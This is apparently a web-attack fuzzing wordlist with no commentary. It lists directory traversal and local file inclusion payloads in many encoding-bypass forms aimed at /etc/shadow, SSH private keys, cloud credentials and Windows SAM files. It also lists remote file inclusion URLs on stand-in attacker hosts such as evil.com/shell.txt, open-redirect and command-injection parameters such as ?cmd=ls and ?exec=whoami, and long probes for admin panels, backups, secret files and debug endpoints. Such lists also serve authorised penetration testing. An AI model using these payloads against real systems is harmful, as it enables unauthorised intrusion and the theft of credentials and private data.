# Directory Traversal Payloads
../../../../../../etc/passwd
../../../../../../etc/hosts
../../../../../../etc/shadow
../../../../../../proc/self/environ
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../windows/system32/drivers/etc/hosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
../../../../../../etc/group
../../../../../../var/log/auth.log
../../../../../../etc/mysql/my.cnf
../../../../../../etc/apache2/apache2.conf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini
../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../proc/self/cmdline
../../../../../../var/log/httpd/error.log
../../../../../../var/log/apache2/error.log
../../../../../../usr/share/apache2/default-site/index.html
../../../../../../home/user/.bash_history
../../../../../../home/user/.ssh/id_rsa
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
%c0%af..%c0%af..%c0%af..%c0%afwindows%c0%afwin.ini
%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../home/user/.config/configstore/config.json
..%5c..%5c..%5c..%5c..%5cboot.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
../../../../../../etc/nginx/nginx.conf
/../../../../../../etc/issue
%5c%5c%5c%5c%5c%5c..%5c%5c%5c%5c%5c%5cetc%5cpasswd
/%2e/%2e/%2e/%2e/%2e/%2e/etc/passwd
/../../../windows/win.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/../../../../../../home/user/.aws/credentials
/../../../../../../root/.bashrc
/../../../../../../opt/local/apache2/conf/httpd.conf
%c0%afetc%c0%afpasswd
/%252e/%252e/%252e/%252e/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
../../../../../../usr/local/etc/php.ini
../../../../../../var/www/html/index.php
../../../../../../var/www/html/robots.txt
/../../../../../../opt/apache2/conf/httpd.conf
/%c0%af%c0%af%c0%af%c0%af%c0%afwindows%c0%afwin.ini
%25%2e%25%2e%25%2f%25%2e%25%2e%25%2f%25%2e%25%2e%25%2fetc%25%2fpasswd
/%c0%af..%c0%afetc%c0%afpasswd
../..%252f../..%252f../..%252f/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group
..%c1%1c..%c1%1c..%c1%1c..%c1%1cetc%c1%1cpasswd
/%c1%1c%c1%1c%c1%1c%c1%1c/etc/shadow
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/shadow
../../../../../../usr/local/lib/php.ini
../../../../../../var/spool/cron/crontabs/root
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/var/log/auth.log
/../../../../../../.bash_profile
/../../../../../../.profile
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/local/apache2/conf/httpd.conf
%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/issue
/../../../../../../usr/local/apache/conf/httpd.conf
/../../../../../../var/lib/mysql/user.MYD
/../../../../../../var/lib/mysql/user.frm
..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
../../../../../../root/.profile
/..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/system32/drivers/etc/hosts
../../../../../../usr/local/cpanel/logs/access_log
/../../../../../../usr/local/apache/logs/error_log
/../../../../../../usr/local/apache/logs/access_log
../../../../../../etc/sudoers
/../../../../../../etc/php.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini
../../../../../../etc/ssh/sshd_config
../../../../../../etc/security/access.conf
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%252fwin.ini
../../../../../../etc/issue.net
/../../../../../../usr/local/etc/apache2/httpd.conf
/../../../../../../etc/mysql/debian.cnf
/../../../../../../usr/share/nginx/html/index.php
/../../../../../../var/www/vhosts/default/htdocs/index.php
../../../../../../usr/local/apache2/conf/extra/httpd-ssl.conf
../../../../../../etc/sysconfig/network
../../../../../../etc/pki/tls/openssl.cnf
../../../../../../var/lib/rpm/Packages
/../../../../../../etc/apt/sources.list

# Local File Inclusion (LFI) Payloads
../../../../../../var/log/apache2/access.log
../../../../../../var/log/apache2/error.log
../../../../../../var/log/httpd/access.log
../../../../../../var/log/httpd/error.log
../../../../../../proc/self/status
../../../../../../proc/version
../../../../../../root/.ssh/id_rsa
../../../../../../home/user/.bash_history
../../../../../../usr/local/apache2/logs/error_log
../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../etc/hostname
../../../../../../etc/issue
../../../../../../etc/motd
../../../../../../var/log/messages
../../../../../../etc/nginx/nginx.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/ssh/sshd_config
../../../../../../etc/mysql/my.cnf
../../../../../../root/.bashrc
../../../../../../root/.zshrc
../../../../../../etc/profile
../../../../../../etc/passwd
../../../../../../etc/shadow
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../windows/system32/config/sam
../../../../../../var/log/maillog
../../../../../../var/log/mail.log
../../../../../../etc/mail/sendmail.cf
../../../../../../etc/apache2/httpd.conf
../../../../../../etc/apache2/apache2.conf
../../../../../../etc/apt/sources.list
../../../../../../etc/crontab
../../../../../../etc/cron.allow
../../../../../../etc/cron.deny
../../../../../../etc/cron.d/
../../../../../../etc/cron.daily/
../../../../../../etc/cron.weekly/
../../../../../../var/spool/cron/crontabs/root
../../../../../../etc/pki/tls/openssl.cnf
../../../../../../usr/local/etc/php.ini
../../../../../../var/lib/dhcp/dhclient.leases
../../../../../../etc/logrotate.conf
../../../../../../etc/issue.net
../../../../../../proc/cpuinfo
../../../../../../proc/meminfo
../../../../../../proc/self/mountinfo
../../../../../../proc/net/arp
../../../../../../proc/net/route
../../../../../../etc/exports
../../../../../../etc/default/grub
../../../../../../usr/local/apache/logs/access_log
../../../../../../usr/local/apache/logs/error_log
../../../../../../var/log/syslog
../../../../../../etc/openvpn/openvpn.conf
../../../../../../etc/pam.d/common-password
../../../../../../etc/security/access.conf
../../../../../../etc/security/limits.conf
../../../../../../etc/pam.d/system-auth
../../../../../../usr/local/nginx/logs/error.log
../../../../../../usr/local/nginx/logs/access.log
../../../../../../usr/share/logwatch/default.conf/logwatch.conf
../../../../../../etc/inetd.conf
../../../../../../etc/httpd/logs/access_log
../../../../../../etc/httpd/logs/error_log
../../../../../../var/lib/mlocate/mlocate.db
../../../../../../etc/postfix/main.cf
../../../../../../etc/postfix/master.cf
../../../../../../var/spool/cron/crontabs
../../../../../../var/log/samba/log.smbd
../../../../../../etc/pure-ftpd/pure-ftpd.conf
../../../../../../usr/local/etc/pure-ftpd.conf
../../../../../../var/log/xferlog
../../../../../../etc/proftpd/proftpd.conf
../../../../../../etc/vsftpd.conf
../../../../../../etc/ufw/ufw.conf
../../../../../../etc/hosts.allow
../../../../../../etc/hosts.deny
../../../../../../var/log/dpkg.log
../../../../../../var/log/yum.log
../../../../../../etc/sudoers
../../../../../../etc/selinux/config
../../../../../../usr/local/cpanel/logs/access_log
../../../../../../usr/local/cpanel/logs/error_log
../../../../../../var/cpanel/cpanel.config
../../../../../../etc/cpanel/cpanel.config
../../../../../../var/cpanel/cpanel.config.cache
../../../../../../etc/cpanel/email_send_limits
../../../../../../etc/pure-ftpd.conf
../../../../../../etc/httpd/conf/httpd.conf.bak
../../../../../../etc/httpd/conf.d/ssl.conf
../../../../../../usr/local/apache2/conf/extra/httpd-ssl.conf
../../../../../../var/lib/mysql/mysql/user.MYD
../../../../../../var/lib/mysql/mysql/user.frm
../../../../../../etc/zabbix/zabbix_server.conf
../../../../../../etc/zabbix/zabbix_agentd.conf
../../../../../../etc/snmp/snmpd.conf
../../../../../../etc/openldap/ldap.conf
../../../../../../etc/openldap/slapd.conf
../../../../../../etc/vmware/hostd/config.xml

# Remote File Inclusion (RFI) Payloads
http://evil.com/shell.txt
https://example.com/malicious_script.php
http://attacker.com/evil.js
https://myattacksite.com/exploit.txt
https://malicious.site/shell.php
http://evil.com/attack.txt
http://malicious.com/inject.html
https://badactor.com/backdoor.php
http://untrusted.com/malware.jsp
https://myhacksite.com/attack.cgi
http://hacker.org/malicious_code.asp
https://phishing.com/stealer.php
http://baddomain.com/jsloader.js
https://testsite.com/suspicious_payload.pl
https://scripts.evil.com/evil.js
http://injection.org/malicious.gif
https://attacker.co/malicious_content.xml
http://hacked.site/virus.bin
https://hackerspace.com/hack.html
http://exploit.com/load.php?file=shell.txt
https://backdoor.com/load_me.php
http://hackme.com/exploit.cgi
https://unsafe.com/inject.pl
http://unsecure.site/hack_me.html
https://phishing.com/phish.png
http://malicious.org/upload/test.doc
https://evilcorp.com/exploit/shell.py
http://insecure.com/include_me.php
https://badguy.com/payload.asp
http://untrustedhost.net/backdoor.jsp
https://injected.com/download/mal.js
http://backdoor.com/load_me/suspicious.asp
https://redirector.com/suspicious?file=malware.exe
http://malicious.co.uk/rfi.txt
https://badserver.net/payload.docx
http://hackers.com/load.cgi
https://evil.site/virus.pdf
http://badserver.com/backdoor/sh.php
https://insecure.net/download/suspicious.txt
http://phishersite.com/evilcontent.php
https://exploitme.org/backdoor/script.jsp
http://suspicious.site/malware?file=virus
https://harmful.com/download/evil.pdf
http://badactor.com/scripts/malicious.png
https://compromisedsite.com/backdoor.bash
http://untrusted.io/include/rfi.py
https://unsafe.org/download.php?file=payload
http://dangerous.net/inject/malicious.js
https://redirect.com/shell.shtm
http://exploited.com/malware/test.txt
https://suspicious.me/phish.html
http://redirector.com/include.php?file=shell
https://hackerspace.com/load/payload.json
http://malicious.com/stealth/hack.gif
https://attackersite.net/cmd.exe
http://unsafe.net/load/file.js
https://exfiltrate.com/download.php?target=malicious
http://phishingsite.com/test.xml
https://badcontent.org/evil_content.jsp
http://badserver.com/download.php?file=exploit
https://untrustedsource.org/shell.txt
http://evil.org/hack/init.asp
https://redirect.net/download_file.php?file=cmd
http://badactor.com/include/injector.js
https://danger.com/exploit/remote.php
http://compromise.me/load?cmd=malware
https://phish.org/cmd.php?file=virus
http://unsecure.io/rfi/test.cgi
https://badcode.com/malicious?inject=backdoor
http://hack.me/download/script.asp
https://suspicious.co/shell.load
http://malware.net/suspicious?include=hackme
https://badguy.org/include.php?payload=virus
http://injection.io/malicious.pl
https://attacker.net/script.mal
http://backdoor.org/download.php?file=exploit.jsp
https://malware.com/download?file=cmd.exe
http://badactor.com/virus/binload.sh
https://badhost.co/evil.js?include=shell
http://exploit.net/remote/inject.php
https://unsecure.site/include/suspicious.css
http://untrustedsite.com/hacked_file?cmd=download
https://compromisedserver.net/backdoor.php
http://malicious.com/injector.asp
https://exploiter.com/hackme.pl
http://untrustedhost.com/virus.png
https://unsafe.co/load_malware.php
http://redirector.net/steal.html
https://phishing.org/evil.txt
http://exploited.com/malware.shtm
https://unsafe.net/include/badfile.png
http://hacker.org/download.php?load=injector
https://backdoor.site/hack_me.php
http://evilcorp.co/js/exploit.js
https://redirectme.com/mal.html
http://phishingsite.net/rfi/test.php
https://badactor.net/load.php?include=exploit
http://malicioussite.com/suspicious_file.bash
https://untrustedsite.com/backdoor.jpg
http://exploit.net/suspicious/trojan.jsp
https://badactor.com/phish.txt

# Admin and Config Pages
/admin
/admin.php
/login
/admin/login
/wp-admin
/wp-login.php
/config
/config.php
/conf
/db
/backup
/backup.zip
/.env
/wordpress/wp-admin
/blog/wp-login.php
/configuration.php
/settings
/secure/settings
/api/admin
/private
/admin/index.php
/admin/controlpanel
/controlpanel
/cpanel
/admin_area
/adminarea
/administrator
/admin/administrator
/admin1
/admin2
/admin3
/admin4
/admin5
/admin/admin
/admin/login.php
/admin1.php
/admin2.php
/admin3.php
/configuration
/configuration/admin
/db/admin
/admin/sql
/adminpanel
/moderator
/mod
/moderate
/admin_panel
/moderator/login
/db/config
/db/db_admin
/data/admin
/administrator/index.php
/administrator/login.php
/admin_login
/account
/useradmin
/user_admin
/admin/config
/admin/configuration
/adminsecure
/admin-console
/admincp
/admin_dashboard
/cpanel/login
/serveradmin
/root
/admin1/login
/app/admin
/secureadmin
/systemadmin
/admin/config.php
/config/admin
/private/admin
/secure/admin
/secure_admin
/server_admin
/db_admin
/admin_console
/secure/database
/sysadmin
/dashboard/admin
/security/admin
/management
/manage
/adminpanel.php
/manager
/webadmin
/wp-admin.php
/wp-admin/admin.php
/administrator/admin.php
/panel/admin
/login/admin
/login/admin.php
/login_panel
/adminpanel/login.php
/administrator/controlpanel
/admin/console
/secure/login
/login/secure
/adminsecure/login
/dashboard
/control_panel
/control
/server
/configuration/login
/adminfiles
/adminportal
/admincontrol
/admin/account

# Common File Extensions with Sensitive Data
/config.bak
/config.old
/database.sql
/admin.old
/admin.bak
/.htaccess
/.git/config
/index.php~backup
/wp-config.php
/config/config.xml
/admin/admin.php
/upload/config.inc.php
/includes/config.php
/install.php
/config.php~
/config.json
/.env
/.env.local
/config.php.bak
/database.sql.gz
/database.sql.tar.gz
/database_backup.sql
/admin/config.php.old
/admin/config.php.bak
/wp-config.php.save
/.gitignore
/.git/HEAD
/.svn/entries
/.git/config
/env/.env
/.DS_Store
/admin/config.json
/admin/settings.json
/db_backup.sql
/.htpasswd
/.bashrc
/.bash_profile
/.mysql_history
/settings.php.bak
/backup.sql
/db.sql
/mysql.sql
/install.sql
/backup.tar.gz
/admin/config.ini
/app/config.ini
/config.yml
/config.yaml
/application/config/config.php
/includes/config.old
/configuration.php.dist
/.idea/workspace.xml
/wp-config.bak
/application/config/database.php
/db_backup.zip
/admin/config.js
/database_backup.sql.gz
/mysql.sql.bak
/.aws/credentials
/.npmrc
/.docker/config.json
/.gitconfig
/db/dump.sql
/db/data.sql
/admin/db_backup.sql
/.htpasswd.old
/htaccess.txt
/config/database.yml
/config.php.swp
/env/.env.bak
/backup.tar
/backup.zip
/admin/config.old
/.vscode/settings.json
/.eslintrc.json
/application.yml
/config/database.js
/db_backup.sql.tar.gz
/admin/config.yml
/private.key
/config.php.sav
/.ssh/id_rsa
/.ssh/authorized_keys
/backup.json
/admin/settings.php
/.git/logs/HEAD
/settings.xml
/nginx.conf
/ftpusers
/.profile
/logs/access.log
/logs/error.log
/admin/.htaccess
/config/database.php
/wp-content/backup-db/db-backup.sql
/admin/config~backup
/database_backup.zip
/admin/config.save
/admin/db_backup.bak
/backup.sql.gz
/backup.sql.old
/.env.production
/config.save
/index.html~
/config.php.ini
/api_keys.txt
/keys.txt
/user.txt
/database.tar.gz
/ftp_backup.sql
/error_log
/secrets.yml
/db_backup.txt
/settings.json
/admin/admin.inc.php
/backup.old

# Backup Files
/backup.tar.gz
/backup.sql
/backup.zip
/.backup
/.backup.tar.gz
/.backup.zip
/devbackup
/db_backup
/wp-backup
/database/backup
/uploads/backup
/backup.old
/admin/backup
/backup.sql.gz
/backup.sql.zip
/backup.sql.tar.gz
/backup.json
/backup.yml
/backup.yaml
/database.sql.bak
/database.sql.old
/mysql_backup.sql
/full_backup.tar
/full_backup.tar.gz
/wp-content/uploads/backup
/public/uploads/backup
/logs_backup
/server_backup.tar.gz
/config_backup.tar.gz
/database_backup.sql
/sql_backup.tar.gz
/site_backup.zip
/backup_2022.sql
/backup_2023.sql
/db_backup.zip
/db_backup.tar.gz
/backup.sql.bak
/db_backup.sql.old
/backup.old.sql
/full_backup.zip
/system_backup
/wordpress_backup
/backup_website.zip
/backup_db.sql
/database_dump.sql
/site.sql.bak
/sql_backup.zip
/website_backup.sql
/admin_backup.tar
/admin_backup.sql
/wordpress_backup.tar
/website_backup.tar.gz
/config_backup.sql
/mysql_dump.sql
/app_backup.zip
/data_backup
/data_backup.tar.gz
/system_backup.zip
/dump.sql
/backup/site_backup.sql
/backup/wp_backup.sql
/sql_backup.sql.gz
/backup_2021.zip
/wp_backup.tar.gz
/backup_wordpress.sql
/database_backup.json
/site_backup.tar.gz
/upload_backup.zip
/upload_backup.tar.gz
/backup-2020.sql
/backup-2021.sql
/public_backup
/mysql/db_backup.sql
/upload/db_backup.sql
/.backup.db.sql
/.backup/wp_backup.sql
/wordpress_backup.sql
/old_backup.tar
/backups/full_backup.sql
/backup_website_2023.tar.gz
/data/db_backup.sql
/full_backup_2021.tar
/system/db_backup.sql
/log_backup.tar
/mysql_backup_2022.sql
/full_website_backup.zip
/website_backup_2023.zip
/backup/old_backup.sql
/app_backup.sql
/app_backup.json
/dbbackup.sql
/backup_copy.zip
/database_backup_2022.sql
/backup_copy.tar.gz
/wp-content/backup/db-backup.sql
/old_db_backup.sql
/wp_database_backup.sql
/old_site_backup.sql
/backup.zip.old
/database-backup.sql
/wp-content/backup.zip
/uploads/backup.zip

# Hidden Files and Common Secret Files
/.hidden
/.hidden_config
/.git
/.svn
/.env
/.npmrc
/.ssh/id_rsa
/.ssh/authorized_keys
/.aws/credentials
/.bash_history
/.git/config
/.npm/_auth
/.npm/_token
/.bashrc
/.bash_profile
/.zshrc
/.zsh_history
/.ssh/known_hosts
/.config
/.config.json
/.docker/config.json
/.vscode/settings.json
/.editorconfig
/.eslintrc.json
/.htpasswd
/.htaccess
/.config/gh/config.yml
/.config/gcloud/credentials.db
/.idea/workspace.xml
/.config/hub
/.config/gcloud/application_default_credentials.json
/.gitignore
/.gitlab-ci.yml
/.github/workflows/main.yml
/.terraform/terraform.tfstate
/.terraform/credentials.tfrc.json
/.env.production
/.env.local
/.secrets
/.secrets.json
/.firebase/hosting.env
/.travis.yml
/.kube/config
/.kubernetes/kubeconfig
/.dockercfg
/.config/service_account.json
/.config/google_credentials.json
/.config/gcloud/configurations/config_default
/.npm/_logs
/.npmrc.bak
/.aws/config
/.aws/credentials.bak
/.ssh/authorized_keys.old
/.bash_logout
/.dbshell
/.pgpass
/.my.cnf
/.mylogin.cnf
/.sqlite_history
/.psql_history
/.zshenv
/.ansible.cfg
/.config/credentials.yml
/.config/credentials.ini
/.config.yml
/.config.yaml
/.cache/credentials
/.cache/aws_credentials
/.config/secrets.json
/.kube/config.bak
/.m2/settings.xml
/.eslintrc
/.eslintignore
/.bashrc.bak
/.bash_profile.bak
/.composer/auth.json
/.config/pip/pip.conf
/.netrc
/.gitattributes
/.envrc
/.local/share/credentials
/.authinfo
/.authinfo.gpg
/.boto
/.profile
/.bashrc.old
/.secrets.yml
/.s3cfg
/.gcloud
/.jupyter/jupyter_notebook_config.py
/.credentials/credentials.json
/.config/gh/hosts.yml
/.gnupg/gpg.conf
/.pgpass.conf
/.vault_pass
/.pip/pip.conf
/.cshrc
/.vimrc
/.env.bak
/.s3/credentials
/.backup/.env
/.aws/config.json
/.azure/azureProfile.json
/.ssh/environment
/.dbus-keyrings

# Sensitive Parameter Names
?id=1
?view=admin
?admin=true
?login=admin
?user=admin
?debug=true
?test=true
?redirect=https://malicious.com
?file=../../../../../../etc/passwd
?path=/etc/passwd
?username=admin&password=admin
?dest=https://attacksite.com
?config=1
?cmd=ls
?exec=whoami
?include=../../../../../../etc/passwd
?view=config
?load=config
?mode=debug
?admin=1
?isAdmin=true
?debugMode=1
?is_debug=true
?preview=true
?editMode=true
?read=/etc/passwd
?download=../../../../../../etc/shadow
?dump=true
?access=admin
?auth=1
?do=login
?module=admin
?login=user
?role=admin
?action=edit
?edit=true
?content=../../../../../../etc/shadow
?view=debug
?target=https://attacker.com
?url=https://phishing.com
?next=https://malicious.com
?continue=https://evil.com
?callback=https://badactor.com
?src=https://insecure.com
?location=https://phish.com
?path=../../../../../../etc/hosts
?load=../../../../../../etc/shadow
?template=../../../../../../etc/passwd
?stylesheet=../../../../../../etc/passwd
?doc=../../../../../../etc/shadow
?home=../../../../../../etc/shadow
?site=../../../../../../etc/passwd
?configFile=../../../../../../etc/passwd
?import=../../../../../../etc/shadow
?settings=../../../../../../etc/passwd
?env=../../../../../../etc/hosts
?open=../../../../../../etc/passwd
?downloadFile=../../../../../../etc/shadow
?theme=../../../../../../etc/shadow
?action=edit
?search=../../../../../../etc/shadow
?search=admin
?query=admin
?user=root
?role=superuser
?root=true
?path=../../../../../../etc/ssh/sshd_config
?logfile=../../../../../../var/log/apache2/access.log
?file=../../../../../../etc/hosts
?dir=../../../../../../etc
?document=../../../../../../etc/passwd
?view=../../../../../../etc/shadow
?configpath=../../../../../../etc/passwd
?debug=1
?flag=admin
?isSuperuser=true
?loginAsAdmin=true
?validate=true
?adminLogin=true
?authToken=12345
?sessionID=abcdef
?token=supersecret
?authKey=abcd1234
?debug_level=9
?show_debug=1
?mode=edit
?edit_user=admin
?user_id=1
?level=superuser
?grant=admin
?access=full
?debugToken=true
?accessToken=98765
?proxy=https://attacker.com
?callback_url=https://malicious.com
?ref=https://evil.com
?host=https://phishing.com
?img=https://hacker.com/malicious.jpg

# API Endpoints and Function Calls
/api/v1/users
/api/v1/admin
/api/v1/auth
/api/v1/getUser
/api/v1/setUser
/api/v2/deleteUser
/api/v2/uploadFile
/api/v1/downloadFile
/api/v1/settings
/api/v1/user?id=1
/api/v2/authenticate
/user/passwordreset
/user/deleteUser
/api/v3/uploadImage
/api/v3/updateProfile
/api/v3/changePassword
/api/v1/login
/api/v1/logout
/api/v1/register
/api/v1/resetPassword
/api/v2/forgotPassword
/api/v2/resetToken
/api/v1/activateUser
/api/v1/deactivateUser
/api/v1/getProfile
/api/v1/editProfile
/api/v2/userRoles
/api/v2/adminRoles
/api/v1/user/details
/api/v1/user/preferences
/api/v1/user/settings
/api/v1/checkStatus
/api/v2/verifyToken
/api/v1/emailVerification
/api/v1/resendActivation
/api/v2/confirmEmail
/api/v1/contactSupport
/api/v1/sendFeedback
/api/v1/getLogs
/api/v2/systemStatus
/api/v3/admin/getLogs
/api/v1/file/upload
/api/v1/file/download
/api/v1/file/delete
/api/v1/files/list
/api/v2/files/upload
/api/v1/files/deleteAll
/api/v1/importData
/api/v2/exportData
/api/v1/config
/api/v1/systemConfig
/api/v1/getConfig
/api/v2/updateConfig
/api/v3/admin/config
/api/v1/reports/generate
/api/v1/reports/view
/api/v2/admin/stats
/api/v1/admin/activityLog
/api/v2/auditLogs
/api/v1/permissions
/api/v2/admin/permissions
/api/v1/roles
/api/v2/userRoles
/api/v1/products
/api/v1/products/list
/api/v1/products/details?id=123
/api/v1/orders
/api/v1/orders/create
/api/v1/orders/delete
/api/v2/orders/cancel
/api/v1/orders/update
/api/v1/transactions
/api/v1/transactions/history
/api/v1/transactions/download
/api/v2/transactions/cancel
/api/v1/invoices
/api/v1/invoices/download
/api/v1/invoices/pay
/api/v1/payment/authorize
/api/v1/payment/capture
/api/v2/payment/refund
/api/v1/cart
/api/v1/cart/add
/api/v1/cart/remove
/api/v1/cart/checkout
/api/v1/cart/applyDiscount
/api/v1/checkout
/api/v1/checkout/process
/api/v1/checkout/complete
/api/v1/shipping
/api/v1/shipping/address
/api/v1/shipping/calculate
/api/v1/notifications
/api/v1/notifications/markRead
/api/v1/notifications/clearAll
/api/v1/messages/send
/api/v1/messages/delete

# Interesting Paths for Debugging and Testing
/debug
/debugger
/debug/log
/phpinfo.php
/info.php
/test.php
/testing.php
/test/setup.php
/test/settings.php
/staging/settings.php
/staging/login
/development
/test/userinfo
/test/password
/staging/admin
/test
/test/debug
/test/log
/test/logs
/test/info
/debug/phpinfo
/debug/config
/debug/status
/debug/settings
/debug/info
/debug/error
/logs
/logfile
/logfiles
/logging
/stats
/status
/env
/version
/api/debug
/api/info
/api/status
/api/test
/staging
/dev
/development/debug
/development/log
/development/info
/devtools
/tools/debug
/tools/info
/tools/test
/dev/debug
/staging/debug
/staging/log
/staging/info
/staging/test
/development/tools
/api/v1/debug
/api/v1/status
/api/v1/test
/api/v1/config
/debug/config.json
/debug/settings.json
/admin/debug
/admin/logs
/debugging
/system/status
/system/logs
/api/v2/status
/api/v2/logs
/testing/status
/testing/logs
/testing/debug
/test/error
/test/errors
/test/settings
/config
/config/status
/config/log
/config/logs
/debug/console
/debug/error.log
/error.log
/test/api
/test/system
/test/env
/debug-env
/debug/settings.php
/api/v1/error
/api/v1/errors
/testing/log
/testing/config
/development/logs
/debug/trace
/test/debug/settings
/devtools/debug
/admin/test
/devtools/log
/devtools/status
/debug-tools
/admin/settings/debug
/admin/staging
/staging/config
/staging/status
/system/config

# Additional Traversal with Encoding Variations
%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c/etc/passwd
..%c0%af..%c0%afetc%c0%afpasswd
..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%255c..%255c..%255c..%255cetc%255cpasswd
..%2e%2e%2f..%2e%2e%2f..%2e%2e%2fetc%2fpasswd
..%2e%2e%5c..%2e%2e%5cetc%5cpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
/%2e/%2e/%2e/%2e/%2e/%2e/etc/passwd
..%2e..%2e..%2f..%2e..%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
/../../../../../../../../../../../../etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
..%255c..%255c..%255c/etc/shadow
..%25c1%259c..%25c1%259c/etc/passwd
..%c1%1c..%c1%1c..%c1%1c/etc/shadow
..%c0%ae..%c0%ae..%c0%ae/etc/hosts
..%c1%af..%c1%af/etc/hosts
%c1%1c..%c1%1c..%c1%1c/etc/passwd
%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%c0%ae..%c0%ae..%c0%ae/etc/passwd
%c1%1c%c1%1c%c1%1c%c1%1c/etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group
%c1%8e..%c1%8e/etc/shadow
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/hosts
..%c1%9c..%c1%9c..%c1%9c/etc/shadow
..%c1%1c..%c1%1c/etc/hosts
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/issue
%c1%afetc%c1%afpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/ssh/sshd_config
%25%2e%25%2e%25%2f%25%2e%25%2e%25%2f%25%2e%25%2e%25%2f%25%2e%25%2e%25%2fetc%25%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/log/auth.log
..%2e%2e%2f..%2e%2e%2f..%2e%2e/etc/passwd
..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
%c1%1c..%c1%1c..%c1%1c/etc/group
%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/local/apache2/conf/httpd.conf
%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
%c0%ae..%c0%ae..%c0%ae/etc/shadow
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%25c1%259c..%25c1%259c/etc/shadow
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/group
%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd
%252f%252e%252e%252f%252e%252e%252fetc%252fshadow
..%252f%252f..%252f%252f..%252f%252fetc%252fpasswd
..%c1%af%c1%af..%c1%afetc%c1%afpasswd
%c0%af..%252f..%252f..%252fetc%252fpasswd
%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fshadow
%252e%2e%252f%252e%2e%252f%252e%2e%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fshadow
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth.log
%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd
/%2e/%2e/%2e/%2e/etc/shadow
/%2e/%2e/%2e/%2e/var/log/maillog
%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fshadow
%c0%af%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fshadow
..%25c0%25af..%25c0%25afetc%25c0%25afpasswd
/%252e/%252e/%252e/%252e/etc/shadow
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group
%252f..%252f..%252f..%252fetc%252fpasswd
..%25c0%25af..%25c0%25afetc%25c0%25afpasswd
%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fshadow
